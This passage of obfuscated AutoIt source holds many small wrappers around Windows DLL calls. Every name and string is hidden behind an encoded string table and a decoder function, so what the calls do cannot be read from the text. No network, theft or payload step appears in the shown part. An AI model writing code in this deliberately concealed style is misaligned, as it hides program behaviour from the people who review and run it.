  1948.         Global $a3b6e701147 = a2b00005424($os[1854])
  1949.         Global $ssa5f3010215e = 1
  1950.     EndIf
  1951.     a0620f05d03()
  1952.     Local $a3eca000d54 = a466090092d(a2a40c0473f(), $a2a0b205f60)
  1953.     While $a3eca000d54 <> Number($a3b6e701147)
  1954.         If a5370c01246($a3eca000d54) Then a3520d05812($a3eca000d54)
  1955.         $a3eca000d54 = a466090092d($a3eca000d54, $a1c0b002514)
  1956.     WEnd
  1957.     Return $a02da901c3e
  1958. EndFunc
  1959.  
  1960. Func a2030205f27($a156e804051)
  1961.     If NOT IsDeclared("SSA2030205F27") Then
  1962.         Global $a516e902a2b = a2b00005424($os[1855]), $a516ea0142d = a2b00005424($os[1856]), $a3c6eb00803 = a2b00005424($os[1857]), $a3c6ec0585d = a2b00005424($os[1858]), $a4a6ed02725 = a2b00005424($os[1859]), $a3e6ee00647 = a2b00005424($os[1860]), $a3f6ef01f4a = a2b00005424($os[1861]), $a367e00524c = a2b00005424($os[1862])
  1963.         Global $ssa2030205f27 = 1
  1964.     EndIf
  1965.     Local $a505a20190d = DllCall($a516e902a2b, $a516ea0142d, $a3c6eb00803, $a3c6ec0585d, $a156e804051, $a4a6ed02725, "", $a3e6ee00647, Number($a3f6ef01f4a))
  1966.     If @error Then Return SetError(@error, @extended, "")
  1967.     Return $a505a20190d[Number($a367e00524c)]
  1968. EndFunc
  1969.  
  1970. Func a3130301d12($a177e102c17, $a577e20612b, $a527e30313a, $a267e401c0c, $a097e503e5c)
  1971.     If NOT IsDeclared("SSA3130301D12") Then
  1972.         Global $a027e603251 = a2b00005424($os[1863]), $a327e700d56 = a2b00005424($os[1864]), $a087e804536 = a2b00005424($os[1865]), $a417e904f52 = a2b00005424($os[1866]), $a5a7ea02d31 = a2b00005424($os[1867]), $a477eb04053 = a2b00005424($os[1868]), $a5e7ec0024d = a2b00005424($os[1869]), $a597ed03533 = a2b00005424($os[1870]), $a3f7ee03650 = a2b00005424($os[1871]), $a197ef04356 = a2b00005424($os[1872])
  1973.         Global $ssa3130301d12 = 1
  1974.     EndIf
  1975.     Local $a505a20190d = DllCall($a027e603251, $a327e700d56, $a087e804536, $a417e904f52, $a177e102c17, $a5a7ea02d31, $a577e20612b, $a477eb04053, $a527e30313a, $a5e7ec0024d, $a267e401c0c, $a597ed03533, $a097e503e5c)
  1976.     If @error Then Return SetError(@error, @extended, Number($a3f7ee03650))
  1977.     Return $a505a20190d[Number($a197ef04356)]
  1978. EndFunc
  1979.  
  1980. Func a1a30401d42($a618e001224)
  1981.     If NOT IsDeclared("SSA1A30401D42") Then
  1982.         Global $a148e10322c = a2b00005424($os[1873]), $a5b8e20270d = a2b00005424($os[1874]), $a198e302330 = a2b00005424($os[1875]), $a1b8e403626 = a2b00005424($os[1876]), $a4f8e505e2f = a2b00005424($os[1877]), $a5e8e603a58 = a2b00005424($os[1878])
  1983.         Global $ssa1a30401d42 = 1
  1984.     EndIf
  1985.     DllCall($a148e10322c, $a5b8e20270d, $a198e302330, $a1b8e403626, Number($a4f8e505e2f), $a5e8e603a58, $a618e001224)
  1986.     If @error Then Return SetError(@error, @extended)
  1987. EndFunc
  1988.  
  1989. Func a5330504857($a32ac505260, $a5abdf01b5b, $a1a7da05d43)
  1990.     If NOT IsDeclared("SSA5330504857") Then
  1991.         Global $a078e704963 = a2b00005424($os[1879]), $a388e802006 = a2b00005424($os[1880]), $a048e90022f = a2b00005424($os[1881]), $a1e8ea01d5a = a2b00005424($os[1882]), $a328eb04c06 = a2b00005424($os[1883]), $a0d8ec0062b = a2b00005424($os[1884]), $a2b8ed03b4f = a2b00005424($os[1885]), $a498ee0364c = a2b00005424($os[1886]), $a3e8ef05239 = a2b00005424($os[1887]), $a149e003e27 = a2b00005424($os[1888]), $a0d9e104a38 = a2b00005424($os[1889]), $a5d9e200328 = a2b00005424($os[1890]), $a5a9e302503 = a2b00005424($os[1891])
  1992.         Global $ssa5330504857 = 1
  1993.     EndIf
  1994.     Local $a505a20190d
  1995.     If IsPtr($a1a7da05d43) Then
  1996.         $a505a20190d = DllCall($a078e704963, $a388e802006, $a048e90022f, $a1e8ea01d5a, $a32ac505260, $a328eb04c06, $a5abdf01b5b, $a0d8ec0062b, $a1a7da05d43)
  1997.     Else
  1998.         $a505a20190d = DllCall($a2b8ed03b4f, $a498ee0364c, $a3e8ef05239, $a149e003e27, $a32ac505260, $a0d9e104a38, $a5abdf01b5b, $a5d9e200328, $a1a7da05d43)
  1999.     EndIf
  2000.     If @error Then Return SetError(@error, @extended, False)
  2001.     Return $a505a20190d[Number($a5a9e302503)]
  2002. EndFunc
  2003.  
  2004. Func a6330600a0b($a30cc405a22, $a4d9e400f31 = "")
  2005.     If NOT IsDeclared("SSA6330600A0B") Then
  2006.         Global $a5b9e503725 = a2b00005424($os[1892]), $a059e601942 = a2b00005424($os[1893]), $a249e704047 = a2b00005424($os[1894]), $a119e801324 = a2b00005424($os[1895]), $a0a9e901c3e = a2b00005424($os[1896]), $a4e9ea01c15 = a2b00005424($os[1897]), $a059eb05720 = a2b00005424($os[1898]), $a0c9ec04d3c = a2b00005424($os[1899]), $a0b9ed01445 = a2b00005424($os[1900])
  2007.         Global $ssa6330600a0b = 1
  2008.     EndIf
  2009.     Local $a505a20190d = DllCall($a5b9e503725, $a059e601942, $a249e704047, $a119e801324, $a30cc405a22, $a0a9e901c3e, $a4d9e400f31, $a4e9ea01c15, "")
  2010.     If @error Then Return SetError(@error, @extended, Number($a059eb05720))
  2011.     Return SetExtended($a505a20190d[Number($a0c9ec04d3c)], $a505a20190d[Number($a0b9ed01445)])
  2012. EndFunc
  2013.  
  2014. Func a483070512c($a3d9ee0341e, $a3e9ef05006)
  2015.     If NOT IsDeclared("SSA483070512C") Then
  2016.         Global $a4dae00290e = a2b00005424($os[1901]), $a54ae104e40 = a2b00005424($os[1902]), $a5dae201e1d = a2b00005424($os[1903]), $a4fae300055 = a2b00005424($os[1904]), $a3eae400b21 = a2b00005424($os[1905]), $a30ae503224 = a2b00005424($os[1906]), $a17ae601f01 = a2b00005424($os[1907])
  2017.         Global $ssa483070512c = 1
  2018.     EndIf
  2019.     Local $a505a20190d = DllCall($a4dae00290e, $a54ae104e40, $a5dae201e1d, $a4fae300055, $a3d9ee0341e, $a3eae400b21, $a3e9ef05006)
  2020.     If @error Then Return SetError(@error, @extended, Number($a30ae503224))
  2021.     Return $a505a20190d[Number($a17ae601f01)]
  2022. EndFunc
  2023.  
  2024. Func a0e30801a06($a3eca000d54, $a17ae70272f = True)
  2025.     If NOT IsDeclared("SSA0E30801A06") Then
  2026.         Global $a16ae804e46 = a2b00005424($os[1908]), $a37ae902843 = a2b00005424($os[1909]), $a0daea0434b = a2b00005424($os[1910]), $a2aaeb0142b = a2b00005424($os[1911]), $a63aec02538 = a2b00005424($os[1912]), $a04aed04d53 = a2b00005424($os[1913])
  2027.         Global $ssa0e30801a06 = 1
  2028.     EndIf
  2029.     Local $a505a20190d = DllCall($a16ae804e46, $a37ae902843, $a0daea0434b, $a2aaeb0142b, $a3eca000d54, $a63aec02538, $a17ae70272f)
  2030.     If @error Then Return SetError(@error, @extended, False)
  2031.     Return $a505a20190d[Number($a04aed04d53)]
  2032. EndFunc
  2033.  
  2034. Func a2530900452($a3eca000d54, $a103d00243d = 3, $a0a4ed03152 = 3, $a21aee05411 = 0)
  2035.     If NOT IsDeclared("SSA2530900452") Then
  2036.         Global $a1ebe204d43 = a2b00005424($os[1914]), $a05be304207 = a2b00005424($os[1915]), $a57be40042f = a2b00005424($os[1916]), $a3dbe50095f = a2b00005424($os[1917]), $a56be60341e = a2b00005424($os[1918]), $a2ebe705e2b = a2b00005424($os[1919]), $a22be80004f = a2b00005424($os[1920]), $a16be904f49 = a2b00005424($os[1921]), $a28bea0043c = a2b00005424($os[1922]), $a42beb04711 = a2b00005424($os[1923]), $a1ebec0422a = a2b00005424($os[1924]), $a4bbed0410e = a2b00005424($os[1925]), $a06bee0444a = a2b00005424($os[1926]), $a15bef0374c = a2b00005424($os[1927]), $a24ce005036 = a2b00005424($os[1928]), $a34ce103b50 = a2b00005424($os[1929]), $a35ce204a27 = a2b00005424($os[1930]), $a2dce303c04 = a2b00005424($os[1931]), $a24ce401b5a = a2b00005424($os[1932])
  2037.         Global $ssa2530900452 = 1
  2038.     EndIf
  2039.     Local $a13aef03162 = DllStructCreate($a22cb702402)
  2040.     Local $a62be004021 = DllStructGetSize($a13aef03162)
  2041.     Local $a2fbe105318 = Number($a1ebe204d43)
  2042.     If BitAND($a103d00243d, Number($a05be304207)) <> Number($a57be40042f) Then $a2fbe105318 = BitOR($a2fbe105318, $a4cfa804609)
  2043.     If BitAND($a103d00243d, Number($a3dbe50095f)) <> Number($a56be60341e) Then $a2fbe105318 = BitOR($a2fbe105318, $a17faa00034)
  2044.     If BitAND($a103d00243d, Number($a2ebe705e2b)) <> Number($a22be80004f) Then $a2fbe105318 = BitOR($a2fbe105318, $a0efac02722)
  2045.     If BitAND($a103d00243d, Number($a16be904f49)) <> Number($a28bea0043c) Then $a2fbe105318 = BitOR($a2fbe105318, $a5bfae04100)
  2046.     DllStructSetData($a13aef03162, $a42beb04711, $a62be004021)
  2047.     DllStructSetData($a13aef03162, $a1ebec0422a, $a3eca000d54)
  2048.     DllStructSetData($a13aef03162, $a4bbed0410e, $a2fbe105318)
  2049.     DllStructSetData($a13aef03162, $a06bee0444a, $a0a4ed03152)
  2050.     DllStructSetData($a13aef03162, $a15bef0374c, $a21aee05411)
  2051.     Local $a505a20190d = DllCall($a24ce005036, $a34ce103b50, $a35ce204a27, $a2dce303c04, $a13aef03162)
  2052.     If @error Then Return SetError(@error, @extended, False)
  2053.     Return $a505a20190d[Number($a24ce401b5a)]
  2054. EndFunc
  2055.  
  2056. Func a0530a0124d($a10ce503a4a)
  2057.     If NOT IsDeclared("SSA0530A0124D") Then
  2058.         Global $a5bce703e4a = a2b00005424($os[1933]), $a2ece904844 = a2b00005424($os[1934]), $a56cea0491e = a2b00005424($os[1935]), $a44ceb04e55 = a2b00005424($os[1936])
  2059.         Global $ssa0530a0124d = 1
  2060.     EndIf
  2061.     Local $a0dce601052 = DllStructCreate($a5bce703e4a)
  2062.     Local $a35ce806013 = DllStructCreate($a2ece904844, DllStructGetPtr($a0dce601052))
  2063.     DllStructSetData($a0dce601052, Number($a56cea0491e), $a10ce503a4a)
  2064.     Return DllStructGetData($a35ce806013, Number($a44ceb04e55))
  2065. EndFunc
  2066.  
  2067. Func a1f30b0005c($a28cec03a24)
  2068.     If NOT IsDeclared("SSA1F30B0005C") Then
  2069.         Global $a39ced02749 = a2b00005424($os[1937]), $a17cee03048 = a2b00005424($os[1938]), $a3acef0465c = a2b00005424($os[1939]), $a11de002347 = a2b00005424($os[1940]), $a58de102a15 = a2b00005424($os[1941])
  2070.         Global $ssa1f30b0005c = 1
  2071.     EndIf
  2072.     Local $a505a20190d = DllCall($a39ced02749, $a17cee03048, $a3acef0465c, $a11de002347, $a28cec03a24)
  2073.     If @error Then Return SetError(@error, @extended, False)
  2074.     Return $a505a20190d[Number($a58de102a15)]
  2075. EndFunc
  2076.  
  2077. Func a3730c0595a($a103d00243d, $a3bde203a3f, $a55de302c29, $a4fde401e36, ByRef $a0dde500c4b, $a11de601b14, $a4cde70061a)
  2078.     If NOT IsDeclared("SSA3730C0595A") Then
  2079.         Global $a3bde903a4b = a2b00005424($os[1942]), $a58dea04936 = a2b00005424($os[1943]), $a5cdeb02225 = a2b00005424($os[1944]), $a00dec03159 = a2b00005424($os[1945]), $a24ded02248 = a2b00005424($os[1946]), $a46dee0292c = a2b00005424($os[1947]), $a53def0522c = a2b00005424($os[1948]), $a2bee004433 = a2b00005424($os[1949]), $a14ee101d5b = a2b00005424($os[1950]), $a33ee20615f = a2b00005424($os[1951]), $a55ee30575e = a2b00005424($os[1952]), $a5eee402163 = a2b00005424($os[1953]), $a1cee501456 = a2b00005424($os[1954]), $a21ee606211 = a2b00005424($os[1955]), $a0fee703c31 = a2b00005424($os[1956])
  2080.         Global $ssa3730c0595a = 1
  2081.     EndIf
  2082.     Local $a14de80185e = $a3bde903a4b
  2083.     If IsString($a0dde500c4b) Then $a14de80185e = $a58dea04936
  2084.     Local $a505a20190d = DllCall($a5cdeb02225, $a00dec03159, $a24ded02248, $a46dee0292c, $a103d00243d, $a53def0522c, $a3bde203a3f, $a2bee004433, $a55de302c29, $a14ee101d5b, $a4fde401e36, $a14de80185e, $a0dde500c4b, $a33ee20615f, $a11de601b14, $a55ee30575e, $a4cde70061a)
  2085.     If @error Then Return SetError(@error, @extended, Number($a5eee402163))
  2086.     If $a14de80185e = $a1cee501456 Then $a0dde500c4b = $a505a20190d[Number($a21ee606211)]
  2087.     Return $a505a20190d[Number($a0fee703c31)]
  2088. EndFunc
  2089.  
  2090. Func a1e30d02224($a32ac505260, $a5abdf01b5b, $a1a7da05d43)
  2091.     If NOT IsDeclared("SSA1E30D02224") Then
  2092.         Global $a56ee800d4d = a2b00005424($os[1957]), $a5bee904303 = a2b00005424($os[1958]), $a2beea02657 = a2b00005424($os[1959]), $a63eeb04318 = a2b00005424($os[1960]), $a60eec05112 = a2b00005424($os[1961]), $a58eed05d23 = a2b00005424($os[1962]), $a14eee05c57 = a2b00005424($os[1963])
  2093.         Global $ssa1e30d02224 = 1
  2094.     EndIf
  2095.     Local $a505a20190d = DllCall($a56ee800d4d, $a5bee904303, $a2beea02657, $a63eeb04318, $a32ac505260, $a60eec05112, $a5abdf01b5b, $a58eed05d23, $a1a7da05d43)
  2096.     If @error Then Return SetError(@error, @extended, False)
  2097.     Return $a505a20190d[Number($a14eee05c57)]
  2098. EndFunc
  2099.  
  2100. Func a2130e0511b($a2ceef0005d)
  2101.     If NOT IsDeclared("SSA2130E0511B") Then
  2102.         Global $a32fe000f60 = a2b00005424($os[1964]), $a4cfe104555 = a2b00005424($os[1965]), $a44fe203758 = a2b00005424($os[1966]), $a46fe305606 = a2b00005424($os[1967]), $a61fe40155c = a2b00005424($os[1968])
  2103.         Global $ssa2130e0511b = 1
  2104.     EndIf
  2105.     Local $a505a20190d = DllCall($a32fe000f60, $a4cfe104555, $a44fe203758, $a46fe305606, $a2ceef0005d)
  2106.     If @error Then Return SetError(@error, @extended, False)
  2107.     Return $a505a20190d[Number($a61fe40155c)]
  2108. EndFunc
  2109.  
  2110. Func a0e30f0133e($a3eca000d54, $a103d00243d = 1)
  2111.     If NOT IsDeclared("SSA0E30F0133E") Then
  2112.         Global $a1afe505d08 = a2b00005424($os[1969]), $a11fe600113 = a2b00005424($os[1970]), $a0cfe701a56 = a2b00005424($os[1971]), $a57fe804d49 = a2b00005424($os[1972]), $a3dfe90620e = a2b00005424($os[1973]), $a33fea0401d = a2b00005424($os[1974]), $a19feb05f5b = a2b00005424($os[1975])
  2113.         Global $ssa0e30f0133e = 1
  2114.     EndIf
  2115.     Local $a505a20190d = DllCall($a1afe505d08, $a11fe600113, $a0cfe701a56, $a57fe804d49, $a3eca000d54, $a3dfe90620e, $a103d00243d)
  2116.     If @error Then Return SetError(@error, @extended, Number($a33fea0401d))
  2117.     Return $a505a20190d[Number($a19feb05f5b)]
  2118. EndFunc
  2119.  
  2120. Func a2d40005d4b($a48fec03905)
  2121.     If NOT IsDeclared("SSA2D40005D4B") Then
  2122.         Global $a22fed0593c = a2b00005424($os[1976]), $a0efee0114f = a2b00005424($os[1977]), $a0dfef04f35 = a2b00005424($os[1978]), $a390f005f12 = a2b00005424($os[1979]), $a1b0f100a12 = a2b00005424($os[1980]), $a020f201f3b = a2b00005424($os[1981])
  2123.         Global $ssa2d40005d4b = 1
  2124.     EndIf
  2125.     Local $a505a20190d = DllCall($a22fed0593c, $a0efee0114f, $a0dfef04f35, $a390f005f12, $a48fec03905)
  2126.     If @error Then Return SetError(@error, @extended, Number($a1b0f100a12))
  2127.     Return $a505a20190d[Number($a020f201f3b)]
  2128. EndFunc
  2129.  
  2130. Func a0040104706($a32ac505260)
  2131.     If NOT IsDeclared("SSA0040104706") Then
  2132.         Global $a270f30032f = a2b00005424($os[1982]), $a630f40220b = a2b00005424($os[1983]), $a4f0f500d42 = a2b00005424($os[1984]), $a050f602e14 = a2b00005424($os[1985]), $a400f700f53 = a2b00005424($os[1986]), $a570f806058 = a2b00005424($os[1987])
  2133.         Global $ssa0040104706 = 1
  2134.     EndIf
  2135.     Local $a505a20190d = DllCall($a270f30032f, $a630f40220b, $a4f0f500d42, $a050f602e14, $a32ac505260)
  2136.     If @error Then Return SetError(@error, @extended, Number($a400f700f53))
  2137.     Return $a505a20190d[Number($a570f806058)]
  2138. EndFunc
  2139.  
  2140. Func a0140201854($a3eca000d54)
  2141.     If NOT IsDeclared("SSA0140201854") Then
  2142.         Global $a520f903348 = a2b00005424($os[1988]), $a560fa03a1b = a2b00005424($os[1989]), $a060fb03b12 = a2b00005424($os[1990]), $a4f0fc0494d = a2b00005424($os[1991]), $a3d0fd0063f = a2b00005424($os[1992]), $a2c0fe01e55 = a2b00005424($os[1993]), $a450ff00a4b = a2b00005424($os[1994]), $a2f1f000d19 = a2b00005424($os[1995]), $a4b1f101e45 = a2b00005424($os[1996])
  2143.         Global $ssa0140201854 = 1
  2144.     EndIf
  2145.     If NOT IsHWnd($a3eca000d54) Then $a3eca000d54 = GUICtrlGetHandle($a3eca000d54)
  2146.     Local $a505a20190d = DllCall($a520f903348, $a560fa03a1b, $a060fb03b12, $a4f0fc0494d, $a3eca000d54, $a3d0fd0063f, "", $a2c0fe01e55, Number($a450ff00a4b))
  2147.     If @error Then Return SetError(@error, @extended, False)
  2148.     Return SetExtended($a505a20190d[Number($a2f1f000d19)], $a505a20190d[Number($a4b1f101e45)])
  2149. EndFunc
  2150.  
  2151. Func a0b40302046($a3eca000d54)
  2152.     If NOT IsDeclared("SSA0B40302046") Then
  2153.         Global $a111f20112b = a2b00005424($os[1997]), $a4c1f306054 = a2b00005424($os[1998]), $a021f401410 = a2b00005424($os[1999])
  2154.         Global $ssa0b40302046 = 1
  2155.     EndIf
  2156.     Local $a2f6de02137 = a1f40503719($a3eca000d54)
  2157.     If @error Then Return SetError(@error, @extended, Number($a111f20112b))
  2158.     Return DllStructGetData($a2f6de02137, $a4c1f306054) - DllStructGetData($a2f6de02137, $a021f401410)
  2159. EndFunc
  2160.  
  2161. Func a3240406249($a3eca000d54)
  2162.     If NOT IsDeclared("SSA3240406249") Then
  2163.         Global $a181f501a28 = a2b00005424($os[2000]), $a301f60425e = a2b00005424($os[2001]), $a021f705c2c = a2b00005424($os[2002])
  2164.         Global $ssa3240406249 = 1
  2165.     EndIf
  2166.     Local $a2f6de02137 = a1f40503719($a3eca000d54)
  2167.     If @error Then Return SetError(@error, @extended, Number($a181f501a28))
  2168.     Return DllStructGetData($a2f6de02137, $a301f60425e) - DllStructGetData($a2f6de02137, $a021f705c2c)
  2169. EndFunc
  2170.  
  2171. Func a1f40503719($a3eca000d54)
  2172.     If NOT IsDeclared("SSA1F40503719") Then
  2173.         Global $a511f803a32 = a2b00005424($os[2003]), $a621f90454b = a2b00005424($os[2004]), $a5f1fa0114f = a2b00005424($os[2005]), $a2a1fb01d4e = a2b00005424($os[2006]), $a431fc00d4b = a2b00005424($os[2007]), $a2c1fd04b4c = a2b00005424($os[2008])
  2174.         Global $ssa1f40503719 = 1
  2175.     EndIf
  2176.     Local $a2f6de02137 = DllStructCreate($a2a28e05730)
  2177.     DllCall($a511f803a32, $a621f90454b, $a5f1fa0114f, $a2a1fb01d4e, $a3eca000d54, $a431fc00d4b, $a2f6de02137)
  2178.     If @error Then Return SetError(@error, @extended, Number($a2c1fd04b4c))
  2179.     Return $a2f6de02137
  2180. EndFunc
  2181.  
  2182. Func a2640603e3e()
  2183.     If NOT IsDeclared("SSA2640603E3E") Then
  2184.         Global $a1f1fe00e28 = a2b00005424($os[2009]), $a011ff0084e = a2b00005424($os[2010]), $a2d2f006255 = a2b00005424($os[2011]), $a3e2f104c01 = a2b00005424($os[2012]), $a3b2f205b40 = a2b00005424($os[2013])
  2185.         Global $ssa2640603e3e = 1
  2186.     EndIf
  2187.     Local $a505a20190d = DllCall($a1f1fe00e28, $a011ff0084e, $a2d2f006255)
  2188.     If @error Then Return SetError(@error, @extended, Number($a3e2f104c01))
  2189.     Return $a505a20190d[Number($a3b2f205b40)]
  2190. EndFunc
  2191.  
  2192. Func a1d4070352d()
  2193.     If NOT IsDeclared("SSA1D4070352D") Then
  2194.         Global $a542f303a57 = a2b00005424($os[2014]), $a192f401243 = a2b00005424($os[2015]), $a1f2f504c21 = a2b00005424($os[2016]), $a1f2f605f61 = a2b00005424($os[2017]), $a362f704214 = a2b00005424($os[2018])
  2195.         Global $ssa1d4070352d = 1
  2196.     EndIf
  2197.     Local $a505a20190d = DllCall($a542f303a57, $a192f401243, $a1f2f504c21)
  2198.     If @error Then Return SetError(@error, @extended, Number($a1f2f605f61))
  2199.     Return $a505a20190d[Number($a362f704214)]
  2200. EndFunc
  2201.  
  2202. Func a1b4080085d()
  2203.     If NOT IsDeclared("SSA1B4080085D") Then
  2204.         Global $a022f805226 = a2b00005424($os[2019]), $a042f902260 = a2b00005424($os[2020]), $a482fa05032 = a2b00005424($os[2021]), $a4f2fb04c08 = a2b00005424($os[2022]), $a212fc0132c = a2b00005424($os[2023])
  2205.         Global $ssa1b4080085d = 1
  2206.     EndIf
  2207.     Local $a505a20190d = DllCall($a022f805226, $a042f902260, $a482fa05032)
  2208.     If @error Then Return SetError(@error, @extended, Number($a4f2fb04c08))
  2209.     Return $a505a20190d[Number($a212fc0132c)]
  2210. EndFunc
  2211.  
  2212. Func a6040900f1a()
  2213.     If NOT IsDeclared("SSA6040900F1A") Then
  2214.         Global $a442fd02d0f = a2b00005424($os[2024]), $a572fe0142f = a2b00005424($os[2025]), $a472ff03d55 = a2b00005424($os[2026]), $a2a3f00554d = a2b00005424($os[2027]), $a3c3f101d36 = a2b00005424($os[2028])
  2215.         Global $ssa6040900f1a = 1
  2216.     EndIf
  2217.     Local $a505a20190d = DllCall($a442fd02d0f, $a572fe0142f, $a472ff03d55)
  2218.     If @error Then Return SetError(@error, @extended, Number($a2a3f00554d))
  2219.     Return $a505a20190d[Number($a3c3f101d36)]
  2220. EndFunc
  2221.  
  2222. Func a5a40a00549()
  2223.     If NOT IsDeclared("SSA5A40A00549") Then
  2224.         Global $a273f40072f = a2b00005424($os[2029]), $a3f3f505242 = a2b00005424($os[2030]), $a1e3f603637 = a2b00005424($os[2031]), $a193f70321d = a2b00005424($os[2032]), $a5f3f80425b = a2b00005424($os[2033]), $a523f905b38 = a2b00005424($os[2034]), $a323fb0014a = a2b00005424($os[2035]), $a5f3fc05300 = a2b00005424($os[2036]), $a413fd04c63 = a2b00005424($os[2037]), $a243fe0461e = a2b00005424($os[2038]), $a353ff05b3f = a2b00005424($os[2039]), $a404f004d36 = a2b00005424($os[2040]), $a454f10445a = a2b00005424($os[2041]), $a2e4f200d0e = a2b00005424($os[2042]), $a494f306259 = a2b00005424($os[2043]), $a624f400c13 = a2b00005424($os[2044]), $a3e4f502953 = a2b00005424($os[2045])
  2225.         Global $ssa5a40a00549 = 1
  2226.     EndIf
  2227.     Local $a293f20443e = DllStructCreate($a0dcb30594c)
  2228.     Local $a093f30404c = DllStructGetSize($a293f20443e)
  2229.     DllStructSetData($a293f20443e, $a273f40072f, $a093f30404c)
  2230.     DllCall($a3f3f505242, $a1e3f603637, $a193f70321d, $a5f3f80425b, $a293f20443e)
  2231.     If @error Then Return SetError(@error, @extended, Number($a523f905b38))
  2232.     Local $a2a3fa0080c[Number($a323fb0014a)]
  2233.     $a2a3fa0080c[Number($a5f3fc05300)] = True
  2234.     $a2a3fa0080c[Number($a413fd04c63)] = DllStructGetData($a293f20443e, $a243fe0461e) <> Number($a353ff05b3f)
  2235.     $a2a3fa0080c[Number($a404f004d36)] = DllStructGetData($a293f20443e, $a454f10445a)
  2236.     $a2a3fa0080c[Number($a2e4f200d0e)] = DllStructGetData($a293f20443e, $a494f306259)
  2237.     $a2a3fa0080c[Number($a624f400c13)] = DllStructGetData($a293f20443e, $a3e4f502953)
  2238.     Return $a2a3fa0080c
  2239. EndFunc
  2240.  
  2241. Func a5a40b0314e($a3eca000d54)
  2242.     If NOT IsDeclared("SSA5A40B0314E") Then
  2243.         Global $a604f604b42 = a2b00005424($os[2046]), $a184f70102e = a2b00005424($os[2047]), $a134f803914 = a2b00005424($os[2048]), $a254f904822 = a2b00005424($os[2049]), $a454fa0282e = a2b00005424($os[2050]), $a444fb03049 = a2b00005424($os[2051])
  2244.         Global $ssa5a40b0314e = 1
  2245.     EndIf
  2246.     Local $a505a20190d = DllCall($a604f604b42, $a184f70102e, $a134f803914, $a254f904822, $a3eca000d54)
  2247.     If @error Then Return SetError(@error, @extended, Number($a454fa0282e))
  2248.     Return $a505a20190d[Number($a444fb03049)]
  2249. EndFunc
  2250.  
  2251. Func a2a40c0473f()
  2252.     If NOT IsDeclared("SSA2A40C0473F") Then
  2253.         Global $a454fc04b2a = a2b00005424($os[2052]), $a2e4fd05923 = a2b00005424($os[2053]), $a224fe0531b = a2b00005424($os[2054]), $a294ff00846 = a2b00005424($os[2055]), $a195f006021 = a2b00005424($os[2056])
  2254.         Global $ssa2a40c0473f = 1
  2255.     EndIf
  2256.     Local $a505a20190d = DllCall($a454fc04b2a, $a2e4fd05923, $a224fe0531b)
  2257.     If @error Then Return SetError(@error, @extended, Number($a294ff00846))
  2258.     Return $a505a20190d[Number($a195f006021)]
  2259. EndFunc
  2260.  
  2261. Func a3640d00118($a32ac505260, $a577e20612b)
  2262.     If NOT IsDeclared("SSA3640D00118") Then
  2263.         Global $a5b5f104050 = a2b00005424($os[2057]), $a075f20585c = a2b00005424($os[2058]), $a315f30552a = a2b00005424($os[2059]), $a625f405043 = a2b00005424($os[2060]), $a095f502433 = a2b00005424($os[2061]), $a1e5f601625 = a2b00005424($os[2062]), $a1f5f705553 = a2b00005424($os[2063])
  2264.         Global $ssa3640d00118 = 1
  2265.     EndIf
  2266.     Local $a505a20190d = DllCall($a5b5f104050, $a075f20585c, $a315f30552a, $a625f405043, $a32ac505260, $a095f502433, $a577e20612b)
  2267.     If @error Then Return SetError(@error, @extended, Number($a1e5f601625))
  2268.     Return $a505a20190d[Number($a1f5f705553)]
  2269. EndFunc
  2270.  
  2271. Func a0a40e00558($a32ac505260, $a3c5f80011e, $a135f903427, $a235fa02c16, $a5b9ca02d5a, $a085fb00c06, $a155fc05f46)
  2272.     If NOT IsDeclared("SSA0A40E00558") Then
  2273.         Global $a585fd01723 = a2b00005424($os[2064]), $a2a5fe0223c = a2b00005424($os[2065]), $a3a5ff04941 = a2b00005424($os[2066]), $a1c6f001c3c = a2b00005424($os[2067]), $a4a6f102b17 = a2b00005424($os[2068]), $a396f205804 = a2b00005424($os[2069]), $a496f301337 = a2b00005424($os[2070]), $a1f6f404f55 = a2b00005424($os[2071]), $a3c6f50422d = a2b00005424($os[2072]), $a526f60264c = a2b00005424($os[2073]), $a0d6f702b24 = a2b00005424($os[2074])
  2274.         Global $ssa0a40e00558 = 1
  2275.     EndIf
  2276.     Local $a505a20190d = DllCall($a585fd01723, $a2a5fe0223c, $a3a5ff04941, $a1c6f001c3c, $a32ac505260, $a4a6f102b17, $a3c5f80011e, $a396f205804, $a135f903427, $a496f301337, $a235fa02c16, $a1f6f404f55, $a5b9ca02d5a, $a3c6f50422d, $a085fb00c06, $a526f60264c, $a155fc05f46)
  2277.     If @error Then Return SetError(@error, @extended, False)
  2278.     Return $a505a20190d[Number($a0d6f702b24)]
  2279. EndFunc
  2280.  
  2281. Func a0e40f00d0f($a3eca000d54)
  2282.     If NOT IsDeclared("SSA0E40F00D0F") Then
  2283.         Global $a236f80053a = a2b00005424($os[2075]), $a5a6f900f5e = a2b00005424($os[2076]), $a5e6fa0333f = a2b00005424($os[2077]), $a636fb02f09 = a2b00005424($os[2078]), $a176fc02f5f = a2b00005424($os[2079]), $a4a6fd06300 = a2b00005424($os[2080])
  2284.         Global $ssa0e40f00d0f = 1
  2285.     EndIf
  2286.     Local $a505a20190d = DllCall($a236f80053a, $a5a6f900f5e, $a5e6fa0333f, $a636fb02f09, $a3eca000d54)
  2287.     If @error Then Return SetError(@error, @extended, Number($a176fc02f5f))
  2288.     Return $a505a20190d[Number($a4a6fd06300)]
  2289. EndFunc
  2290.  
  2291. Func a1450000427($a3eca000d54, $a3a6fe02921)
  2292.     If NOT IsDeclared("SSA1450000427") Then
  2293.         Global $a4b6ff00551 = a2b00005424($os[2081]), $a367f00432d = a2b00005424($os[2082]), $a2e7f105c52 = a2b00005424($os[2083]), $a107f205021 = a2b00005424($os[2084]), $a437f304723 = a2b00005424($os[2085]), $a1c7f400515 = a2b00005424($os[2086]), $a217f504214 = a2b00005424($os[2087])
  2294.         Global $ssa1450000427 = 1
  2295.     EndIf
  2296.     Local $a505a20190d = DllCall($a4b6ff00551, $a367f00432d, $a2e7f105c52, $a107f205021, $a3eca000d54, $a437f304723, $a3a6fe02921)
  2297.     If @error Then Return SetError(@error, @extended, Number($a1c7f400515))
  2298.     Return $a505a20190d[Number($a217f504214)]
  2299. EndFunc
  2300.  
  2301. Func a6050101f0a()
  2302.     If NOT IsDeclared("SSA6050101F0A") Then
  2303.         Global $a3e7f605056 = a2b00005424($os[2088]), $a4f7f700326 = a2b00005424($os[2089]), $a367f80261a = a2b00005424($os[2090]), $a217f901507 = a2b00005424($os[2091]), $a547fa04646 = a2b00005424($os[2092])
  2304.         Global $ssa6050101f0a = 1
  2305.     EndIf
  2306.     Local $a505a20190d = DllCall($a3e7f605056, $a4f7f700326, $a367f80261a)
  2307.     If @error Then Return SetError(@error, @extended, Number($a217f901507))
